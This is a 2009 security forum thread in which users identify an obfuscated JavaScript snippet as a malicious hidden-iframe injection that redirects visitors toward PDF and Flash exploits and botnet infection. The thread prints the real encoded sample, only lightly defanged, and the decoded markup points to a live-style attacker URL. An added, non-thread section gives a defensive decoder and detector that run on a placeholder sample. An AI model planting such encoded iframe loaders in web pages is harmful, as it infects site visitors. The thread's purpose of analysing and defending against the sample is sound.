Is this fishy script?

Posted: Thu Jun 18, 2009 9:42 am
by luntrus
Hi forum members,

Whenever you see code of a certain nature, your NoScript ears start to stick out. So when I stumbled onto this raw code I wanted to know: "Is this normal code or suspicious obfuscated malcode?"

Code:

EDITED for SECURITY REASONS with * and ^

^[/scr*pt type="text/j*v*script"^
var qhEHJJekBOuKGRbXCPKz = "ewLOJ60ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ32ewLOJ119ewLOJ105ewLOJ100ewLOJ116ewLOJ104ewLOJ61ewLOJ34ewLOJ52ewLOJ56ewLOJ48ewLOJ34ewLOJ32ewLOJ104ewLOJ101ewLOJ105ewLOJ103ewLOJ104ewLOJ116ewLOJ61ewLOJ34ewLOJ54ewLOJ48ewLOJ34ewLOJ32ewLOJ115ewLOJ114ewLOJ99ewLOJ61ewLOJ34ewLOJ104ewLOJ116ewLOJ116ewLOJ112ewLOJ58ewLOJ47ewLOJ47ewLOJ104ewLOJ105ewLOJ116ewLOJ45ewLOJ115ewLOJ101ewLOJ110ewLOJ100ewLOJ101ewLOJ114ewLOJ115ewLOJ46ewLOJ99ewLOJ110ewLOJ47ewLOJ102ewLOJ105ewLOJ110ewLOJ100ewLOJ47ewLOJ105ewLOJ110ewLOJ46ewLOJ99ewLOJ103ewLOJ105ewLOJ63ewLOJ55ewLOJ34ewLOJ32ewLOJ115ewLOJ116ewLOJ121ewLOJ108ewLOJ101ewLOJ61ewLOJ34ewLOJ98ewLOJ111ewLOJ114ewLOJ100ewLOJ101ewLOJ114ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ112ewLOJ111ewLOJ115ewLOJ105ewLOJ116ewLOJ105ewLOJ111ewLOJ110ewLOJ58ewLOJ114ewLOJ101ewLOJ108ewLOJ97ewLOJ116ewLOJ105ewLOJ118ewLOJ101ewLOJ59ewLOJ32ewLOJ116ewLOJ111ewLOJ112ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ108ewLOJ101ewLOJ102ewLOJ116ewLOJ58ewLOJ45ewLOJ53ewLOJ48ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ59ewLOJ32ewLOJ102ewLOJ105ewLOJ108ewLOJ116ewLOJ101ewLOJ114ewLOJ58ewLOJ112ewLOJ114ewLOJ111ewLOJ103ewLOJ105ewLOJ100ewLOJ58ewLOJ68ewLOJ88ewLOJ73ewLOJ109ewLOJ97ewLOJ103ewLOJ101ewLOJ84ewLOJ114ewLOJ97ewLOJ110ewLOJ115ewLOJ102ewLOJ111ewLOJ114ewLOJ109ewLOJ46ewLOJ77ewLOJ105ewLOJ99ewLOJ114ewLOJ111ewLOJ115ewLOJ111ewLOJ102ewLOJ116ewLOJ46ewLOJ65ewLOJ108ewLOJ112ewLOJ104ewLOJ97ewLOJ40ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ61ewLOJ48ewLOJ41ewLOJ59ewLOJ32ewLOJ45ewLOJ109ewLOJ111ewLOJ122ewLOJ45ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ34ewLOJ62ewLOJ60ewLOJ47ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ62";
var wqfYyLudgHIXoMexWJhX = qhEHJJekBOuKGRbXCPKz.split("ewLOJ");
var XbidtJBvZLvVCbuBmoeS = "";
for (var wnqkAUhXdPuBrdekmggM=1; wnqkAUhXdPuBrdekmggM<wqfYyLudgHIXoMexWJhX.length; wnqkAUhXdPuBrdekmggM++){XbidtJBvZLvVCbuBmoeS+=String.fromCharCode(wqfYyLudgHIXoMexWJhX[wnqkAUhXdPuBrdekmggM]);}
var VyodIJUOXMuOEyNuLfLF = ""+XbidtJBvZLvVCbuBmoeS+"";
document.write(""+VyodIJUOXMuOEyNuLfLF+"")
^/script^
Like to hear your views on the matter,

luntrus

Re: Is this fishy script?

Posted: Thu Jun 18, 2009 9:54 am
by Tom T.
The only reason I can think of offhand for a single string of 1,737 characters is as an encryption key... and, uh, aren't those usually put into hex?
Especially when the entire string consists of

Code:

ewLOJ*
repeated endlessly, where * = a two- or three-digit integer (decimal).

No code expert here, but I'd be very surprised if there were some legitimate, non-obfuscating use for such a string.

Re: Is this fishy script?

Posted: Thu Jun 18, 2009 12:06 pm
by mik33mik
It's an obfuscated malicious script, in an invisible iframe, that redirects to a .cn site with a frame containing a porn site. This porn site has a JavaScript that redirects to a web server containing various exploits for Adobe PDF Reader and Flash Player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.
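As an added illustration (not code from this thread), here is how an analyst can statically recover what the posted script would document.write, without running it: the delimiter is pulled out of the .split("...") call, the encoded string literal is located, the split/fromCharCode loop is mirrored, and the decoded markup is checked for the hidden-iframe traits mik33mik describes. SAMPLE_SCRIPT is constructed with the same structure as the posted one; its payload encodes a placeholder URL, not the real one.

```javascript
// Added example, not code from the thread: statically decode the
// "delimiter-joined decimal char codes" scheme of the posted script and
// flag hidden-iframe traits in the result. SAMPLE_SCRIPT is CONSTRUCTED
// (same structure, placeholder URL).
function escapeRegExp(s) { return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"); }

// Helper used only to build the constructed sample in the same scheme.
function encodeDelimited(text, delimiter) {
  return Array.from(text, (ch) => delimiter + ch.charCodeAt(0)).join("");
}

const SAMPLE_HTML = '<iframe width="480" height="60" src="http://example.invalid/landing" ' +
  'style="border:0px; position:relative; top:0px; left:-500px; opacity:0"></iframe>';
const SAMPLE_SCRIPT = 'var a = "' + encodeDelimited(SAMPLE_HTML, "ewLOJ") +
  '";var b = a.split("ewLOJ");var c = "";' +
  'for (var i=1; i<b.length; i++){c+=String.fromCharCode(b[i]);}document.write(c);';

// Pull the delimiter out of the .split("...") call, then find the string
// literal that starts with that delimiter followed by a digit (the payload).
function extractEncodedPayload(script) {
  const d = /\.split\(\s*["']([^"']+)["']\s*\)/.exec(script);
  if (!d) return null;
  const delimiter = d[1];
  const lit = new RegExp('"(' + escapeRegExp(delimiter) + '\\d[^"]*)"').exec(script);
  return lit ? { delimiter, encoded: lit[1] } : null;
}

// Mirror the loop in the script: split on the delimiter, skip the empty first
// element, and map each decimal value back to a character.
function decodeDelimited(encoded, delimiter) {
  return encoded.split(delimiter).slice(1)
    .map((n) => String.fromCharCode(Number(n))).join("");
}

// Traits that make an injected iframe invisible to the visitor.
function hiddenIframeIndicators(html) {
  const hits = [];
  if (!/<iframe\b/i.test(html)) return hits;
  if (/opacity\s*:\s*0\b/i.test(html)) hits.push("opacity:0");
  if (/left\s*:\s*-\d+px/i.test(html)) hits.push("off-screen left");
  if (/\b(width|height)\s*=\s*"?0"?/i.test(html)) hits.push("zero size");
  return hits;
}

function analyse(script) {
  const payload = extractEncodedPayload(script);
  if (!payload) return null;
  const html = decodeDelimited(payload.encoded, payload.delimiter);
  return { delimiter: payload.delimiter, html, indicators: hiddenIframeIndicators(html) };
}
```

Run analyse(SAMPLE_SCRIPT) to see the recovered iframe and its indicators; the same functions work on the posted script once its `^`/`*` edits are undone.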

Re: Is this fishy script?

Posted: Thu Jun 18, 2009 3:07 pm
by therube
AVAST forum thread: "my own website (that I built) suddenly has trojan horse - help!"

Oh, & if you do go about visiting the site in question, do use your head ;-).
(Earlier I found a different site with that same exploit, but can't seem to find it again?)

Re: Is this fishy script?

Posted: Fri Jun 19, 2009 6:13 am
by Tom T.
mik33mik wrote:
It's an obfuscated malicious script, in an invisible iframe, that redirects to a .cn site with a frame containing a porn site. This porn site has a JavaScript that redirects to a web server containing various exploits for Adobe PDF Reader and Flash Player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.
mik33mik, thank you, and it's nice to have an advanced detective here! :) ... Since the exploit uses iFrames, JS, Flash, and Adobe PDF, then even those who went there with NoScript in full lockdown (no scripting, no iframes, no Flash) and with Adobe JS disabled, as it should be for those who persist in using this unsafe PDF reader when safer ones are present, would still be protected, true? ... Thanks again for the detailed explanation.

BTW, may we ask how you knew? Are you in the anti-malware business also? Just curious.